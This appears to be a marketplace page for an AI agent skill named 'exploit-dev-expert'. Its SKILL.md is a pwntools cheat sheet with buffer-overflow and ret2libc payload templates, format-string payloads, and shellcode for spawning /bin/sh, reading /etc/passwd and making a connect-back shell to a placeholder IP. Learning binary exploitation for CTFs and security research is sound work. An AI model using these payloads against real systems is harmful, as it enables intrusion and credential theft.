ripgraphics/exploit-dev-expert
.agent/skills/exploit-dev-expert/SKILL.md
Exploit development expert. Buffer overflow, shellcode, ROP, format strings, binary exploitation. Use for exploit writing and PoC development.
development
Updated Apr 16, 2026
$ install --global
skillsauthnpx skillsauth add ripgraphics/authorsinfo exploit-dev-expertInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 16, 2026, 3:14 PM9.2s1 file scanned
SKILL.md
- name:
- exploit-dev-expert
- description:
- >-
Exploit Development Expert
Binary Exploitation Basics
Buffer Overflow
from pwn import *
# Find offset
cyclic(200) # Generate pattern
cyclic_find(0x61616166) # Find offset
# Basic exploit
offset = 64
ret_addr = p64(0x401234)
payload = b'A' * offset + ret_addr
# With NX bypass (ret2libc)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
system = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))
Format String
# Read from stack
payload = b'%x.' * 20
payload = b'%7$s' # Read specific position
# Write to address
payload = fmtstr_payload(offset, {target_addr: value})
Shellcode
# Using pwntools
context.arch = 'amd64'
shellcode = asm(shellcraft.sh())
# Common shellcodes
shellcraft.sh() # /bin/sh
shellcraft.cat('/etc/passwd')
shellcraft.connect('IP', PORT)
Pwntools Essentials
from pwn import *
# Setup
context.binary = ELF('./vuln')
context.log_level = 'debug'
# Connection
p = process('./vuln') # Local
p = remote('ip', port) # Remote
p = gdb.debug('./vuln') # With GDB
# I/O
p.sendline(payload)
p.recvuntil(b'>')
data = p.recv(100)
# Interactive
p.interactive()
GDB Commands
gdb ./binary
> checksec # Security features
> info functions # List functions
> disas main # Disassemble
> b *0x401234 # Breakpoint
> r < payload.txt # Run with input
> x/20wx $rsp # Examine stack
Related Skills
ripgraphics/webpack-expert
tools
VerifiedTrustedCommunity
Webpack build optimization expert with deep knowledge of configuration patterns, bundle analysis, code splitting, module federation, performance optimization, and plugin/loader ecosystem. Use PROACTIVELY for any Webpack bundling issues including complex optimizations, build performance, custom plugins/loaders, and modern architecture patterns. If a specialized expert is a better fit, I will recommend switching and stop.
SKILL.mdUpdated Apr 16, 2026
ripgraphics/web-security-expert
development
VerifiedTrustedCommunity
Web application security expert. OWASP Top 10, XSS, SQLi, CSRF, SSRF, authentication bypass, IDOR. Use for web app security testing.
SKILL.mdUpdated Apr 16, 2026
ripgraphics/vitest-testing-expert
testing
VerifiedTrustedCommunity
Vitest testing framework expert for Vite integration, Jest migration, browser mode testing, and performance optimization
SKILL.mdUpdated Apr 16, 2026
ripgraphics/vite-expert
tools
VerifiedTrustedCommunity
Vite build optimization expert with deep knowledge of ESM-first development, HMR optimization, plugin ecosystem, production builds, library mode, and SSR configuration. Use PROACTIVELY for any Vite bundling issues including dev server performance, build optimization, plugin development, and modern ESM patterns. If a specialized expert is a better fit, I will recommend switching and stop.
SKILL.mdUpdated Apr 16, 2026